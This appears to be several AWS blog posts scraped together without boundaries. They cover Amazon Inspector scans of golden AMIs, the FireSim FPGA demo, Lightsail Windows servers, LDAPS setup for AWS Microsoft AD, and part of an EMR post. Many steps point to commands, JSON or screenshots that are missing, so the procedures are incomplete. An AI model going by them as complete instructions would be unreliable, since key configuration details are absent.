As companies mature in their cloud journey, they implement layered security capabilities and practices in their cloud architectures. One such practice is to continually assess golden Amazon Machine Images (AMIs) for security vulnerabilities. AMIs provide the information required to launch an Amazon EC2 instance, which is a virtual server in the AWS Cloud. A golden AMI is an AMI that contains the latest security patches, software, configuration, and software agents that you need to install for logging, security maintenance, and performance monitoring. You can build and deploy golden AMIs in your environment, but the AMIs quickly become dated as new vulnerabilities are discovered.

A security best practice is to perform routine vulnerability assessments of your golden AMIs to identify if newly found vulnerabilities apply to them. If you identify a vulnerability, you can update your golden AMIs with the appropriate security patches, test the AMIs, and deploy the patched AMIs in your environment. In this blog post, I demonstrate how to use Amazon Inspector to set up such continuous vulnerability assessments to scan your golden AMIs routinely.

Solution overview

Amazon Inspector performs security assessments of Amazon EC2 instances by using AWS managed rules packages such as the Common Vulnerabilities and Exposures (CVEs) package. The solution in this post creates EC2 instances from golden AMIs and then runs an Amazon Inspector security assessment on the created instances. When the assessment results are available, the solution consolidates the findings and advises you about next steps. Furthermore, the solution schedules an Amazon CloudWatch Events rule to run the golden AMI vulnerability assessments on a regular basis.

The following solution diagram illustrates how this solution works.

Here’s how this solution works, as illustrated in the preceding diagram:

Later in this blog post, I provide instructions for creating this JSON parameter.

For each AMI specified in the JSON parameter, the Lambda function creates an EC2 instance. When each instance starts, it installs the Amazon Inspector agent by using the user-data script provided in the JSON. The Lambda function then copies each golden AMI’s tags (you will assign custom metadata in the form of tags to each golden AMI when you set up the solution) to the corresponding EC2 instance. The function also adds a tag with the key of continuous-assessment-instance and value as true. This tag identifies EC2 instances that require regular security assessments. The Lambda function copies the AMI’s tags to the instance (and later, to the security findings found for the instance) to help you identify the golden AMIs for each security finding. After you analyze security findings, you can patch your golden AMIs.

The first time the StartContinuousAssessment function runs, it creates:

An Amazon Inspector assessment template: The template contains a reference to the Amazon Inspector assessment target created in the preceding step and the following AWS managed rules packages to evaluate:

For subsequent assessments, the StartContinuousAssessment function reuses the target and the template created during the first run of StartContinuousAssessment function.

Note: Amazon Inspector can start an assessment only after it finds at least one running Amazon Inspector agent. To allow EC2 instances to boot and the Amazon inspector agent to start, the Lambda function waits four minutes. Because the assessment runs for approximately one hour and boot time for EC2 instances typically takes a few minutes, all Amazon Inspector agents start before the assessment ends.

The Lambda function then runs the assessment. The Amazon Inspector agents collect behavior and configuration data, and pass it to Amazon Inspector. Amazon Inspector analyzes the data and generates Amazon Inspector findings, which are possible security findings you may need to address.

After the Lambda function completes the assessment, Amazon Inspector publishes an assessment-completion notification message to an Amazon SNS topic called ContinuousAssessmentCompleteTopic. SNS uses topics, which are communication channels for sending messages and subscribing to notifications.

The notification message published to SNS triggers the AnalyzeInspectorFindings Lambda function, which performs the following actions:

Associates the tags of each EC2 instance with security findings found for that EC2 instance. This enables you to identify the security findings using the app-name tag you specified for your golden AMIs. You can use the information provided in the findings to patch your golden AMIs.

Terminates all instances associated with the continuous-assessment-instance=true tag.

Aggregates the number of findings found for each EC2 instance by severity and then publishes a consolidated result to an SNS topic called ContinuousAssessmentResultsTopic.

How to deploy the solution

To deploy this solution, you must set it up in the AWS Region where you build your golden AMIs. If that AWS Region does not support Amazon Inspector, at the end of your continuous integration pipeline, you can copy your AMIs to an AWS Region where Amazon Inspector assessments are supported. To learn more about continuous integration pipelines, see What is Continuous Integration?

Run the supplied AWS CloudFormation template and subscribe to an SNS topic to receive assessment results – Set up the infrastructure required to run vulnerability assessments and subscribe to an SNS topic to receive assessment results via email.

Test golden AMI vulnerability assessments – Ensure you have successfully set up the required resources to run vulnerability assessments.

Set up a CloudWatch Events rule for triggering continuous golden AMI vulnerability assessments – Schedule the execution of vulnerability assessments on a regular basis.

1. Tag your golden AMIs

You can search assessment findings based on golden AMI tags after Amazon Inspector completes an assessment.

Choose your AMI from the list, and then choose Actions > Add/Edit Tags.

Choose Create Tag. In the Key column, type app-name. In the Value column, type your application name. Following the same steps, create the app-version and app-environment tags. Choose Save.

Now that you have tagged your golden AMIs, you need to create golden AMI metadata, which will be read by the StartContinuousAssessment function to initiate vulnerability assessments. You will store the golden AMI metadata in the Systems Manager Parameter Store.

This solution reads golden AMI metadata from a parameter stored in the Systems Manager Parameter Store. The metadata must be in JSON format and must contain the following information for each golden AMI:

Ami-Id

InstanceType

UserData

Step A: Find the AMI ID of your golden AMI.

An AMI ID uniquely identifies an AMI in an AWS Region and is a required parameter for launching an EC2 instance from a golden AMI. To find the AMI ID of your golden AMI:

The user-data script automates the installation of software packages when an EC2 instance launches for the first time. In this step, you create an operating system specific, JSON-compatible user-data script that installs and starts the Amazon Inspector agent.

Based on Running Commands on Your Linux Instance at Launch, you make a Linux shell script user-data compatible by prefixing it with a #!/bin/bash. In this step, you add the #!/bin/bash prefix to the script from the preceding step. The following is the user-data compatible version of the script from the preceding step.

The user-data script provided in the JSON metadata must be JSON-compatible, which you will do next.

Make the user-data script JSON compatible

To make the user-data script JSON compatible, you must replace all new-line characters with a \r\n\r\n sequence. The following is the JSON-compatible user-data script that you specify for your Amazon Linux-based golden AMI in Step D.

Repeat Steps A, B, and C to find the Ami Id, InstanceType, and UserData for each of your golden AMIs. When you have this metadata, you can create the JSON document of metadata for all your golden AMIs. The StartContinuousAssessment Lambda function reads this JSON to start golden AMI vulnerability assessments.

Replace all placeholder values with values corresponding to your first golden AMI. If your golden AMI is Amazon Linux-based, you can specify the userData as the JSON-compatible-user-data-for-Amazon-Linux-AMI from Step C.5. Next, replace the placeholder values for your second golden AMI. You can add more entries to your JSON document, if you have more than two golden AMIs.

Note: The total number of characters in the JSON document must be fewer than or equal to 4,096 characters, and the number of golden AMIs must be fewer than 500. You must verify whether your account has permissions to run one on-demand EC2 instance for each of your golden AMIs. For information about how to verify service limits, see Amazon EC2 Service Limits.

Now that you have created the JSON document of your golden AMIs, you will store the JSON document in a Systems Manager parameter. The StartContinuousAssessment Lambda function will read the metadata from this parameter.

Choose Create subscription. In the Topic ARN field, paste the ARN of ContinuousAssessmentResultsTopic that you noted in the previous section.

In the Protocol drop-down, choose Email.

In the Endpoint box, type the email address where you will receive notifications.

Choose Create subscription.

Navigate to your email application and open the message from AWS Notifications. Click the link to confirm your subscription to the SNS topic.

4. Test golden AMI vulnerability assessments

Before you schedule vulnerability assessments, you should test the process by running the StartContinuousAssessment function. In this test, you trigger a security assessment and monitor it. You then receive an email after the assessment has completed, which shows that vulnerability assessments have been successfully set up.

On Dashboard under Recent Assessment Runs, you will see an entry with the status, Collecting Data. This status indicates that Amazon Inspector agents are collecting data from instances running your golden AMIs. The agents collect data for an hour and then Amazon Inspector analyzes the collected data.

After Amazon Inspector completes the assessment, the status in the console changes to Analysis complete. Amazon Inspector then publishes an SNS message that triggers the AnalyzeInspectionReports Lambda function. When AnalyzeInspectionReports publishes results, you will receive an email containing consolidated assessment results. You also will be able to see the findings.

In the navigation pane, choose Assessment Runs. In the table on the Amazon Inspector – Assessment Runs page, choose the findings of the latest assessment run.

Choose the settings () icon and choose the appropriate tags to see the details of findings, as shown in the following screenshot. The findings also contain information about how you can address each underlying vulnerability.

Having verified that you have successfully set up all components of golden AMI vulnerability assessments, you now will schedule the vulnerability assessments to run on a regular basis to give you continual insight into the health of instances created from your golden AMIs.

For Rule definition, type ContinuousGoldenAMIAssessmentTrigger for the name, and type as the description, This rule triggers the continuous golden AMI vulnerability assessment process.

Choose Create rule.

The vulnerability assessments are executed on the first occurrence of the schedule you chose while setting up the CloudWatch Events rule. After the vulnerability assessment is executed, you will receive an email to indicate that your continuous golden AMI vulnerability assessments are set up.

Summary

To get visibility into the security of your EC2 instances created from your golden AMIs, it is important that you perform security assessments of your golden AMIs on a regular basis. In this blog post, I have demonstrated how to set up vulnerability assessments, and the results of these continuous golden AMI vulnerability assessments can help you keep your environment up to date with security patches. To learn how to patch your golden AMIs, see Streamline AMI Maintenance and Patching Using Amazon EC2 Systems Manager.

If you have comments about this blog post, submit them in the “Comments” section below. If you have questions about implementing the solution in this post, start a new thread on the Amazon Inspector forum or contact AWS Support.

The recent addition of Xilinx FPGAs to AWS Cloud compute offerings is one way that AWS is enabling global growth in the areas of advanced analytics, deep learning and AI. The customized F1 servers use pooled accelerators, enabling interconnectivity of up to 8 FPGAs, each one including 64 GiB DDR4 ECC protected memory, with a dedicated PCIe x16 connection. That makes this a powerful engine with the capacity to process advanced analytical applications at scale, at a significantly faster rate. For example, AWS commercial partner Edico Genome is able to achieve an approximately 30X speedup in analyzing whole genome sequencing datasets using their DRAGEN platform powered with F1 instances.

While the availability of FPGA F1 compute on-demand provides clear accessibility and cost advantages, many mainstream users are still finding that the “threshold to entry” in developing or running FPGA-accelerated simulations is too high. Researchers at the UC Berkeley RISE Lab have developed “FireSim”, powered by Amazon FPGA F1 instances as an open-source resource, FireSim lowers that entry bar and makes it easier for everyone to leverage the power of an FPGA-accelerated compute environment. Whether you are part of a small start-up development team or working at a large datacenter scale, hardware-software co-design enables faster time-to-deployment, lower costs, and more predictable performance. We are excited to feature FireSim in this post from Sagar Karandikar and his colleagues at UC-Berkeley.

―Mia Champion, Sr. Data Scientist, AWS

Mapping an 8-node FireSim cluster simulation to Amazon EC2 F1

As traditional hardware scaling nears its end, the data centers of tomorrow are trending towards heterogeneity, employing custom hardware accelerators and increasingly high-performance interconnects. Prototyping new hardware at scale has traditionally been either extremely expensive, or very slow. In this post, I introduce FireSim, a new hardware simulation platform under development in the computer architecture research group at UC Berkeley that enables fast, scalable hardware simulation using Amazon EC2 F1 instances.

FireSim benefits both hardware and software developers working on new rack-scale systems: software developers can use the simulated nodes with new hardware features as they would use a real machine, while hardware developers have full control over the hardware being simulated and can run real software stacks while hardware is still under development. In conjunction with this post, we’re releasing the first public demo of FireSim, which lets you deploy your own 8-node simulated cluster on an F1 Instance and run benchmarks against it. This demo simulates a pre-built “vanilla” cluster, but demonstrates FireSim’s high performance and usability.

Why FireSim + F1?

FPGA-accelerated hardware simulation is by no means a new concept. However, previous attempts to use FPGAs for simulation have been fraught with usability, scalability, and cost issues. FireSim takes advantage of EC2 F1 and open-source hardware to address the traditional problems with FPGA-accelerated simulation:Problem #1: FPGA-based simulations have traditionally been expensive, difficult to deploy, and difficult to reproduce. FireSim uses public-cloud infrastructure like F1, which means no upfront cost to purchase and deploy FPGAs. Developers and researchers can distribute pre-built AMIs and AFIs, as in this public demo (more details later in this post), to make experiments easy to reproduce. FireSim also automates most of the work involved in deploying an FPGA simulation, essentially enabling one-click conversion from new RTL to deploying on an FPGA cluster.

Problem #2: FPGA-based simulations have traditionally been difficult (and expensive) to scale. Because FireSim uses F1, users can scale out experiments by spinning up additional EC2 instances, rather than spending hundreds of thousands of dollars on large FPGA clusters.

Problem #3: Finding open hardware to simulate has traditionally been difficult.Finding open hardware that can run real software stacks is even harder. FireSim simulates RocketChip, an open, silicon-proven, RISC-V-based processor platform, and adds peripherals like a NIC and disk device to build up a realistic system. Processors that implement RISC-V automatically support real operating systems (such as Linux) and even support applications like Apache and Memcached. We provide a custom Buildroot-based FireSim Linux distribution that runs on our simulated nodes and includes many popular developer tools.

Problem #4: Writing hardware in traditional HDLs is time-consuming. Both FireSim and RocketChip use the Chisel HDL, which brings modern programming paradigms to hardware description languages. Chisel greatly simplifies the process of building large, highly parameterized hardware components.

How to use FireSim for hardware/software co-design

FireSim drastically improves the process of co-designing hardware and software by acting as a push-button interface for collaboration between hardware developers and systems software developers. The following diagram describes the workflows that hardware and software developers use when working with FireSim.

Figure 2. The FireSim custom hardware development workflow.

The hardware developer’s view:

Write custom RTL for your accelerator, peripheral, or processor modification in a productive language like Chisel.

Run a software simulation of your hardware design in standard gate-level simulation tools for early-stage debugging.

Run FireSim build scripts, which automatically build your simulation, run it through the Vivado toolchain/AWS shell scripts, and publish an AFI.

Deploy your simulation on EC2 F1 using the generated simulation driver and AFI

Run real software builds released by software developers to benchmark your hardware

The software developer’s view:

Deploy the AMI/AFI generated by the hardware developer on an F1 instance to simulate a cluster of nodes (or scale out to many F1 nodes for larger simulated core-counts).

Connect using SSH into the simulated nodes in the cluster and boot the Linux distribution included with FireSim. This distribution is easy to customize, and already supports many standard software packages.

Directly prototype your software using the same exact interfaces that the software will see when deployed on the real future system you’re prototyping, with the same performance characteristics as observed from software, even at scale.

FireSim demo v1.0

Figure 3. Cluster topology simulated by FireSim demo v1.0.

This first public demo of FireSim focuses on the aforementioned “software-developer’s view” of the custom hardware development cycle. The demo simulates a cluster of 1 to 8 RocketChip-based nodes, interconnected by a functional network simulation. The simulated nodes work just like “real” machines: they boot Linux, you can connect to them using SSH, and you can run real applications on top. The nodes can see each other (and the EC2 F1 instance on which they’re deployed) on the network and communicate with one another. While the demo currently simulates a pre-built “vanilla” cluster, the entire hardware configuration of these simulated nodes can be modified after FireSim is open-sourced.

In this post, I walk through bringing up a single-node FireSim simulation for experienced EC2 F1 users. For more detailed instructions for new users and instructions for running a larger 8-node simulation, see FireSim Demo v1.0 on Amazon EC2 F1. Both demos walk you through setting up an instance from a demo AMI/AFI and booting Linux on the simulated nodes. The full demo instructions also walk you through an example workload, running Memcached on the simulated nodes, with YCSB as a load generator to demonstrate network functionality.

Deploying the demo on F1

In this release, we provide pre-built binaries for driving simulation from the host and a pre-built AFI that contains the FPGA infrastructure necessary to simulate a RocketChip-based node.

Starting your F1 instances

First, launch an instance using the free FireSim Demo v1.0 product available on the AWS Marketplace on an f1.2xlarge instance. After your instance has booted, log in using the user name centos. On the first login, you should see the message “FireSim network config completed.” This sets up the necessary tap interfaces and bridge on the EC2 instance to enable communicating with the simulated nodes.

AMI contents

The AMI contains a variety of tools to help you run simulations and build software for RISC-V systems, including the riscv64 toolchain, a Buildroot-based Linux distribution that runs on the simulated nodes, and the simulation driver program. For more details, see the AMI Contents section on the FireSim website.

Single-node demo

First, you need to flash the FPGA with the FireSim AFI. To do so, run:

This automatically calls the simulation driver, telling it to load the Linux kernel image and root filesystem for the Linux distro. This produces output similar to the following:

Simulations Started. You can use the UART console of each simulated node by attaching to the following screens:

There is a screen on:

2492.fsim0 (Detached)

1 Socket in /var/run/screen/S-centos.

You could connect to the simulated UART console by connecting to this screen, but instead opt to use SSH to access the node instead.

First, ping the node to make sure it has come online. This is currently required because nodes may get stuck at Linux boot if the NIC does not receive any network traffic. For more information, see Troubleshooting/Errata. The node is always assigned the IP address 192.168.1.10:

At this point, you know that the simulated node is online. You can connect to it using SSH with the user name root and password firesim. It is also convenient to make sure that your TERM variable is set correctly. In this case, the simulation expects TERM=linux, so provide that:

Now you can run programs on the simulated node, as you would with a real machine. For an example workload (running YCSB against Memcached on the simulated node) or to run a larger 8-node simulation, see the full FireSim Demo v1.0 on Amazon EC2 F1 demo instructions.

Finally, when you are finished, you can shut down the simulated node by running the following command from within the simulated node:

# poweroff

You can confirm that the simulation has ended by running screen -ls, which should now report that there are no detached screens.

Future plans

At Berkeley, we’re planning to keep improving the FireSim platform to enable our own research in future data center architectures, like FireBox. The FireSim platform will eventually support more sophisticated processors, custom accelerators (such as Hwacha), network models, and peripherals, in addition to scaling to larger numbers of FPGAs. In the future, we’ll open source the entire platform, including Midas, the tool used to transform RTL into FPGA simulators, allowing users to modify any part of the hardware/software stack. Follow @firesimproject on Twitter to stay tuned to future FireSim updates.

Acknowledgements

FireSim is the joint work of many students and faculty at Berkeley: Sagar Karandikar, Donggyu Kim, Howard Mao, David Biancolin, Jack Koenig, Jonathan Bachrach, and Krste Asanović. This work is partially funded by AWS through the RISE Lab, by the Intel Science and Technology Center for Agile HW Design, and by ASPIRE Lab sponsors and affiliates Intel, Google, HPE, Huawei, NVIDIA, and SK hynix.

Today we are adding support for Windows-based Virtual Private Servers. You can launch a VPS that runs Windows Server 2012 R2, Windows Server 2016, or Windows Server 2016 with SQL Server 2016 Express and be up and running in minutes. You can use your VPS to build, test, and deploy .NET or Windows applications without having to set up or run any infrastructure. Backups, DNS management, and operational metrics are all accessible with a click or two.

Servers are available in five sizes, with 512 MB to 8 GB of RAM, 1 or 2 vCPUs, and up to 80 GB of SSD storage. Prices (including software licenses) start at $10 per month:

You can try out a 512 MB server for one month (up to 750 hours) at no charge.

Launching a Windows VPS To launch a Windows VPS, log in to Lightsail , click on Create instance, and select the Microsoft Windows platform. Then click on Apps + OS if you want to run SQL Server 2016 Express, or OS Only if Windows is all you need:

If you want to use a Powershell script to customize your instance after it launches for the first time, click on Add launch script and enter the script:

Choose your instance plan, enter a name for your instance(s), and select the quantity to be launched, then click on Create:

Your instance will be up and running within a minute or so:

Click on the instance, and then click on Connect using RDP:

This will connect using a built-in, browser-based RDP client (you can also use the IP address and the credentials with another client):

Available Today This feature is available today in the US East (Northern Virginia), US East (Ohio), US West (Oregon), EU (London), EU (Ireland), EU (Frankfurt), Asia Pacific (Singapore), Asia Pacific (Mumbai), Asia Pacific (Sydney), and Asia Pacific (Tokyo) Regions.

Starting today, you can encrypt the Lightweight Directory Access Protocol (LDAP) communications between your applications and AWS Directory Service for Microsoft Active Directory, also known as AWS Microsoft AD. Many Windows and Linux applications use Active Directory’s (AD) LDAP service to read and write sensitive information about users and devices, including personally identifiable information (PII). Now, you can encrypt your AWS Microsoft AD LDAP communications end to end to protect this information by using LDAP Over Secure Sockets Layer (SSL)/Transport Layer Security (TLS), also called LDAPS. This helps you protect PII and other sensitive information exchanged with AWS Microsoft AD over untrusted networks.

Solution overview

Before going into specific deployment steps, I will provide a high-level overview of deploying LDAPS. I cover how you enable LDAPS on AWS Microsoft AD. In addition, I provide some general background about CA deployment models and explain how to apply these models when deploying Microsoft CA to enable LDAPS on AWS Microsoft AD.

How you enable LDAPS on AWS Microsoft AD

LDAP-aware applications (LDAP clients) typically access LDAP servers using Transmission Control Protocol (TCP) on port 389. By default, LDAP communications on port 389 are unencrypted. However, many LDAP clients use one of two standards to encrypt LDAP communications: LDAP over SSL on port 636, and LDAP with StartTLS on port 389. If an LDAP client uses port 636, the LDAP server encrypts all traffic unconditionally with SSL. If an LDAP client issues a StartTLS command when setting up the LDAP session on port 389, the LDAP server encrypts all traffic to that client with TLS. AWS Microsoft AD now supports both encryption standards when you enable LDAPS on your AWS Microsoft AD domain controllers.

You enable LDAPS on your AWS Microsoft AD domain controllers by installing a digital certificate that a CA issued. Though Windows servers have different methods for installing certificates, LDAPS with AWS Microsoft AD requires you to add a Microsoft CA to your AWS Microsoft AD domain and deploy the certificate through autoenrollment from the Microsoft CA. The installed certificate enables the LDAP service running on domain controllers to listen for and negotiate LDAP encryption on port 636 (LDAP over SSL) and port 389 (LDAP with StartTLS).

Background of CA deployment models

You can deploy CAs as part of a single-level or multi-level CA hierarchy. In a single-level hierarchy, all certificates come from the root of the hierarchy. In a multi-level hierarchy, you organize a collection of CAs in a hierarchy and the certificates sent to computers and users come from subordinate CAs in the hierarchy (not the root).

Certificates issued by a CA identify the hierarchy to which the CA belongs. When a computer sends its certificate to another computer for verification, the receiving computer must have the public certificate from the CAs in the same hierarchy as the sender. If the CA that issued the certificate is part of a single-level hierarchy, the receiver must obtain the public certificate of the CA that issued the certificate. If the CA that issued the certificate is part of a multi-level hierarchy, the receiver can obtain a public certificate for all the CAs that are in the same hierarchy as the CA that issued the certificate. If the receiver can verify that the certificate came from a CA that is in the hierarchy of the receiver’s “trusted” public CA certificates, the receiver trusts the sender. Otherwise, the receiver rejects the sender.

Deploying Microsoft CA to enable LDAPS on AWS Microsoft AD

Microsoft offers a standalone CA and an enterprise CA. Though you can configure either as single-level or multi-level hierarchies, only the enterprise CA integrates with AD and offers autoenrollment for certificate deployment. Because you cannot sign in to run commands on your AWS Microsoft AD domain controllers, an automatic certificate enrollment model is required. Therefore, AWS Microsoft AD requires the certificate to come from a Microsoft enterprise CA that you configure to work in your AD domain. When you install the Microsoft enterprise CA, you can configure it to be part of a single-level hierarchy or a multi-level hierarchy. As a best practice, AWS recommends a multi-level Microsoft CA trust hierarchy consisting of a root CA and a subordinate CA. I cover only a multi-level hierarchy in this post.

In a multi-level hierarchy, you configure your subordinate CA by importing a certificate from the root CA. You must issue a certificate from the root CA such that the certificate gives your subordinate CA the right to issue certificates on behalf of the root. This makes your subordinate CA part of the root CA hierarchy. You also deploy the root CA’s public certificate on all of your computers, which tells all your computers to trust certificates that your root CA issues and to trust certificates from any authorized subordinate CA.

In such a hierarchy, you typically leave your root CA offline (inaccessible to other computers in the network) to protect the root of your hierarchy. You leave the subordinate CA online so that it can issue certificates on behalf of the root CA. This multi-level hierarchy increases security because if someone compromises your subordinate CA, you can revoke all certificates it issued and set up a new subordinate CA from your offline root CA. To learn more about setting up a secure CA hierarchy, see Securing PKI: Planning a CA Hierarchy.

When a Microsoft CA is part of your AD domain, you can configure certificate templates that you publish. These templates become visible to client computers through AD. If a client’s profile matches a template, the client requests a certificate from the Microsoft CA that matches the template. Microsoft calls this process autoenrollment, and it simplifies certificate deployment. To enable LDAPS on your AWS Microsoft AD domain controllers, you create a certificate template in the Microsoft CA that generates SSL and TLS-compatible certificates. The domain controllers see the template and automatically import a certificate of that type from the Microsoft CA. The imported certificate enables LDAP encryption.

Steps to enable LDAPS for your AWS Microsoft AD directory

The rest of this post is composed of the steps for enabling LDAPS for your AWS Microsoft AD directory. First, though, I explain which components you must have running to deploy this solution successfully. I also explain how this solution works and include an architecture diagram.

Prerequisites

The instructions in this post assume that you already have the following components running:

The solution setup

The following diagram illustrates the setup with the steps you need to follow to enable LDAPS for AWS Microsoft AD. You will learn how to set up a subordinate Microsoft enterprise CA (in this case, SubordinateCA) and join it to your AWS Microsoft AD domain (in this case, corp.example.com). You also will learn how to create a certificate template on SubordinateCA and configure AWS security group rules to enable LDAPS for your directory.

As a prerequisite, I already created a standalone Microsoft root CA (in this case RootCA) for creating SubordinateCA. RootCA also has a local user account called RootAdmin that has administrative permissions to issue certificates to SubordinateCA. Note that you may already have a root CA or a multi-level CA hierarchy in your on-premises network that you can use for creating SubordinateCA instead of creating a new root CA. If you choose to use your existing on-premises CA hierarchy, you must have administrative permissions on your on-premises CA to issue a certificate to SubordinateCA.

Lastly, I also already created an Amazon EC2 instance (in this case, Management) that I use to manage users, configure AWS security groups, and test the LDAPS connection. I join this instance to the AWS Microsoft AD directory domain.

Add a Microsoft enterprise CA to your AWS Microsoft AD domain (in this case, SubordinateCA) so that it can issue certificates to your directory domain controllers to enable LDAPS. This step includes joining SubordinateCA to your directory domain, installing the Microsoft enterprise CA, and obtaining a certificate from RootCA that grants SubordinateCA permissions to issue certificates.

I now will show you these steps in detail. I use the names of components—such as RootCA, SubordinateCA, and Management—and refer to users—such as Admin, RootAdmin, and CAAdmin—to illustrate who performs these steps. All component names and user names in this post are used for illustrative purposes only.

Deploy the solution

Step 1: Delegate permissions to CA administrators

In this step, you delegate permissions to your users who manage your CAs. Your users then can join a subordinate CA to your AWS Microsoft AD domain and create the certificate template in your CA.

In this step, you set up a subordinate Microsoft enterprise CA and join it to your AWS Microsoft AD directory domain. I will summarize the process first and then walk through the steps.

First, you create an Amazon EC2 for Windows Server instance called SubordinateCA and join it to the domain, corp.example.com. You then publish RootCA’s public certificate and certificate revocation list (CRL) to SubordinateCA’s local trusted store. You also publish RootCA’s public certificate to your directory domain. Doing so enables SubordinateCA and your directory domain controllers to trust RootCA. You then install the Microsoft enterprise CA service on SubordinateCA and request a certificate from RootCA to make SubordinateCA a subordinate Microsoft CA. After RootCA issues the certificate, SubordinateCA is ready to issue certificates to your directory domain controllers.

Note that you can use an Amazon S3 bucket to pass the certificates between RootCA and SubordinateCA.

In detail, here is how the process works, as illustrated in the preceding diagram:

Set up an Amazon EC2 instance joined to your AWS Microsoft AD directory domain – Create an Amazon EC2 for Windows Server instance to use as a subordinate CA, and join it to your AWS Microsoft AD directory domain. For this example, the machine name is SubordinateCA and the domain is corp.example.com.

Share RootCA’s public certificate with SubordinateCA – Log in to RootCA as RootAdmin and start Windows PowerShell with administrative privileges. Run the following commands to copy RootCA’s public certificate and CRL to the folder c:\rootcerts on RootCA.

The following screenshot shows RootCA’s public certificate and CRL uploaded to an S3 bucket.

Publish RootCA’s public certificate to your directory domain – Log in to SubordinateCA as the CAAdmin. Download RootCA’s public certificate and CRL from the S3 bucket by following the instructions in How Do I Download an Object from an S3 Bucket? Save the certificate and CRL to the C:\rootcerts folder on SubordinateCA. Add RootCA’s public certificate and the CRL to the local store of SubordinateCA and publish RootCA’s public certificate to your directory domain by running the following commands using Windows PowerShell with administrative privileges.

Install the subordinate Microsoft enterprise CA – Install the subordinate Microsoft enterprise CA on SubordinateCA by following the instructions in Install a Subordinate Certification Authority. Ensure that you choose Enterprise CA for Setup Type to install an enterprise CA.

For the CA Type, choose Subordinate CA.

Request a certificate from RootCA – Next, copy the certificate request on SubordinateCA to a folder called c:\CARequest by running the following commands using Windows PowerShell with administrative privileges.

New-Item c:\CARequest -type directory
Copy c:\*.req C:\CARequest

Upload the certificate request to the S3 bucket.

Approve SubordinateCA’s certificate request – Log in to RootCA as RootAdmin and download the certificate request from the S3 bucket to a folder called CARequest. Submit the request by running the following command using Windows PowerShell with administrative privileges.

In the Certification Authority window, expand the ROOTCA tree in the left pane and choose Pending Requests. In the right pane, note the value in the Request ID column. Right-click the request and choose All Tasks > Issue.

Retrieve the SubordinateCA certificate – Retrieve the SubordinateCA certificate by running following command using Windows PowerShell with administrative privileges. The command includes the <RequestId> that you noted in the previous step.

certreq –retrieve <RequestId><drive>:\subordinateCA.crt

Upload SubordinateCA.crt to the S3 bucket.

Install the SubordinateCA certificate – Log in to SubordinateCA as the CAAdmin and download SubordinateCA.crt from the S3 bucket. Install the certificate by running following commands using Windows PowerShell with administrative privileges.

certutil –installcert c:\subordinateCA.crt
start-service certsvc

Delete the content that you uploaded to S3 –As a security best practice, delete all the certificates and CRLs that you uploaded to the S3 bucket in the previous steps because you already have installed them on SubordinateCA.

You have finished setting up the subordinate Microsoft enterprise CA that is joined to your AWS Microsoft AD directory domain. Now you can use your subordinate Microsoft enterprise CA to create a certificate template so that your directory domain controllers can request a certificate to enable LDAPS for your directory.

Step 3: Create a certificate template

In this step, you create a certificate template with server authentication and autoenrollment enabled on SubordinateCA. You create this new template (in this case, ServerAuthentication) by duplicating an existing certificate template (in this case, Domain Controller template) and adding server authentication and autoenrollment to the template.

You have finished creating a certificate template with server authentication and autoenrollment enabled on SubordinateCA. Your AWS Microsoft AD directory domain controllers can now obtain a certificate through autoenrollment to enable LDAPS.

Step 4: Configure AWS security group rules

In this step, you configure AWS security group rules so that your directory domain controllers can connect to the subordinate CA to request a certificate. To do this, you must add outbound rules to your directory’s AWS security group (in this case, sg-4ba7682d) to allow all outbound traffic to SubordinateCA’s AWS security group (in this case, sg-6fbe7109) so that your directory domain controllers can connect to SubordinateCA for requesting a certificate. You also must add inbound rules to SubordinateCA’s AWS security group to allow all incoming traffic from your directory’s AWS security group so that the subordinate CA can accept incoming traffic from your directory domain controllers.

You have completed the configuration of AWS security group rules to allow traffic between your directory domain controllers and SubordinateCA.

Step 5: AWS Microsoft AD enables LDAPS

The AWS Microsoft AD domain controllers perform this step automatically by recognizing the published template and requesting a certificate from the subordinate Microsoft enterprise CA. The subordinate CA can take up to 180 minutes to issue certificates to the directory domain controllers. The directory imports these certificates into the directory domain controllers and enables LDAPS for your directory automatically. This completes the setup of LDAPS for the AWS Microsoft AD directory. The LDAP service on the directory is now ready to accept LDAPS connections!

Step 6: Test LDAPS access by using the LDP tool

In this step, you test the LDAPS connection to the AWS Microsoft AD directory by using the LDP tool. The LDP tool is available on the Management machine where you installed Active Directory Administration Tools. Before you test the LDAPS connection, you must wait up to 180 minutes for the subordinate CA to issue a certificate to your directory domain controllers.

To test LDAPS, you connect to one of the domain controllers using port 636. Here are the steps to test the LDAPS connection:

Switch to the tree view and navigate to corp.example.com>CORP> Domain Controllers. In the right pane, right-click on one of the domain controllers and choose Properties. Copy the DNS name of the domain controller.

Launch the LDP.exe tool by launching Windows PowerShell and running the LDP.exe command.

In the LDP tool, choose Connection > Connect.

In the Server box, paste the DNS name you copied in the previous step. Type 636 in the Port box. Choose OK to test the LDAPS connection to port 636 of your directory.

You should see the following message to confirm that your LDAPS connection is now open.

You have completed the setup of LDAPS for your AWS Microsoft AD directory! You can now encrypt LDAP communications between your Windows and Linux applications and your AWS Microsoft AD directory using LDAPS.

Summary

In this blog post, I walked through the process of enabling LDAPS for your AWS Microsoft AD directory. Enabling LDAPS helps you protect PII and other sensitive information exchanged over untrusted networks between your Windows and Linux applications and your AWS Microsoft AD. To learn more about how to use AWS Microsoft AD, see the Directory Service documentation. For general information and pricing, see the Directory Service home page.

If you have comments about this blog post, submit a comment in the “Comments” section below. If you have implementation or troubleshooting questions, start a new thread on the Directory Service forum.

Amazon EMR lets you have complete control over your cluster, giving you the flexibility to customize a cluster and install additional applications easily. EMR customers often use bootstrap actions to install and configure custom software in a cluster. However, bootstrap actions only run during the cluster or node startup. This makes it difficult for you to make configuration changes after a cluster is already running.

EMR clusters can also use a custom Amazon Machine Image (AMI). With the new support for launching clusters with custom Amazon Linux AMIs, customizing an EMR cluster is now even easier. However, the task of creating and managing custom AMIs can become increasingly difficult as the number of AMIs in your environment starts to increase.

Amazon EC2 Systems Manager helps you automate various management tasks such as automating AMI creation or running a command or script across hundreds of instances. In this post, I show how Systems Manager Automation can be used to automate the creation and patching of custom Amazon Linux AMIs for EMR.

Systems Manager Run Command lets you remotely manage the configuration of Amazon EC2 instances or on-premises machines. Run Command can be used to help you perform the following types of tasks on your EMR cluster nodes: install applications, restart daemons (HDFS, YARN, Presto, etc.), and make configuration changes. I also show how you can use Run Command to send commands to all nodes of a running EMR cluster.

Benefits of using a custom AMI

Although you can easily customize an EMR cluster using bootstrap actions, there can be benefits to using a custom AMI.

